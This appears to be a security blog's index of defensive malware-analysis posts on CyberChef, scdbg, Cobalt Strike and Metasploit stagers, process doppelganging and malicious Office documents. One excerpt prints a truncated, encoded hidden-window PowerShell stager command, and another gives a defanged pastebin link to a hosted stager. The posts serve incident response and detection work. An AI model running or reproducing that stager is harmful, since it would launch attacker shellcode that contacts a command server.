Skip to main content

Posts

CyberChef - YARA - The pattern matching swiss knife

One of the best features of Cyberchef is YARA and yara rules can be run for a given file to classify and gain knowledge about the file. It can also quickly give an understanding and basic characteristics of the file Follow the below demo to know how to use yara rules in cyberchef  Cyberchef - https://gchq.github.io/CyberChef/  
Recent posts

Decode FIN6 Cobalt Strike stagers

This post explains about decoding FIN6 cobalt strike stagers using cyberchef and scdbg. Attackers leverage pastebin to host cobalt strike stagers or malicious droppers and few of them are still active on pastebin though the final c2 or  domains are not active. Below is one of those pastebin httpstagers  hxxps://pastebin[.]com/raw/HPpvY00Q. One of my previous posts  Decoding Metasploit and CobaltStrike shells  explains how to use CyberChef to fully decode and get the shellcode from an encoded powershell command and further it will be fed into scdbg emulator to get the IP address of C2. Here scdbg command line version for linux is used to emulate the shellcode  References:  CyberChef Scdbg Cobalt Strike stagers used by FIN6 Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware

Dridex shellcode analysis using scdbg

This post explains how to use scdbg  to analyse one type of shellcode generated by Metasploit framework or CobaltStrike to get the C2 domain/IP address so that the incident responder can able to identify and block the further adversary activity. FYI this post doesn't cover the initial infection vector (like phishing thorough office maldoc) or how the shellcode will get generated (like from Metasploit framework or Cobaltstrike).  The previous post Decoding Metasploit and CobaltStrike shells explains how to leverage CyberChef to fully decode and get the shellcode from an encoded powershell command and further it will be fed into scdbg emulator to get the IP address of C2 or an adversary scdbg is a shellcode analysis application built around the libemu emulation library. When run it will display to the user all of the windows APIs the shellcode attempts to call  Finally, there are other ways to analyse shellcode in various platforms. This is just an explanatory post to leverage a gui

Decoding Metasploit and CobaltStrike shells

Introduction This post is about how to decode one type of shellcode generated by Metasploit framework and CobaltStrike to get the C2 domain/IP address so that the incident responder can able to identify and block the further adversary activity. FYI this post doesn't cover the initial infection vector (like phishing thorough office maldoc) or how the shellcode will get generated (like from Metasploit framework or Cobaltstrike ). It leverages CyberChef to fully decode and get the shellcode from an encoded powershell command and further it will be fed into scdbg  emulator to get the IP address of C2 or an adversary ShellCode Here we have the encoded powershell command  powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAH

Mimikatz Process Doppleganging

This post is just about running a tool created by hasherezade  to perform process doppleganging. All credit goes to the researchers Tal Liberman   and Eugene Kogan from  enSilo and also  hasherezade I just wanted to simulate the same process doppleganging and detect with  pe-sieve , it is recommended to walk through author's blackhat presentation  Lost in transaction - Process Doppelgänging and tool creator's write up  Process Doppelgänging – a new way to impersonate a process Process doppelganing is a code injection technique ( can be a substitute to traditional process hollowing code injection technique) that leverages NTFS transacations related Windows API calls which are less used with malicious intent and hence "less known" to AV vendors, hence this code injection technique is more likely to go undetected. The Doppelgänging objective is to load and execute aribitrary code in the context of a legitimate process, none of the process hollowing API calls li

Maldoc external relatonship with type oleobject

Introduction  Phishing malicious documents can contain external relationship with type oleobject. A defender objective is to kill the attack at the early stage by blocking malicious domains at perimeter, this post levarages  Cyberchef   to extract payload urls quickly from malicious office documents CyberChef is an open source tool maintained by GCHQ . It provides a drag and drop interface via a web browser (Firefox & Chrome) to quickly perform a wide range of data manipulation functions called 'operations'. A sequence of operations is called a 'recipe'. As all the processing is client-side, CyberChef can be downloaded and used offline or in an air-gapped forensic network. CyberChef has operations useful for disk forensics, malware & network analysts, and even OSINT researchers. Tools  Cyberchef    Analysis  All document samples are pulled from Hybrid Analysis - a free malware analysis service for the community that detects and analyzes unknown t

Malicious office doc with process hollowing shellcode

Introduction  This post covers how to identify and extract shellcode manually from hancitor phishing office document. Refer  Part-1  and  Part-2  to get an understanding of  tools and approach to analyse phishing documents.  Tools  Didier Stevens Suite    sudo pip install oletools  Analysis   SHA256:  5d077b1341a6472f02aac89488976d4395a91ae4f23657b0344da74f4a560c8d   This sample contains encoded shellcode that starts a new (suspended) explorer.exe process, injects its own code (an embedded, encoded exe) and executes it.  This maldoc leverages  VBA macros  to execute its payload  and t he encoded shellcode is a property in stream 17.  T he shellcode uses WIN32 API functions like CreateProcess, ZwUnmapViewOfSection, GetThreadContext, ResumeThread etc. to inject code into the newly created process (explorer.exe) and execute it. This method is called process hollowing or process replacement.The explorer.exe process is created in a suspended state, the code for explore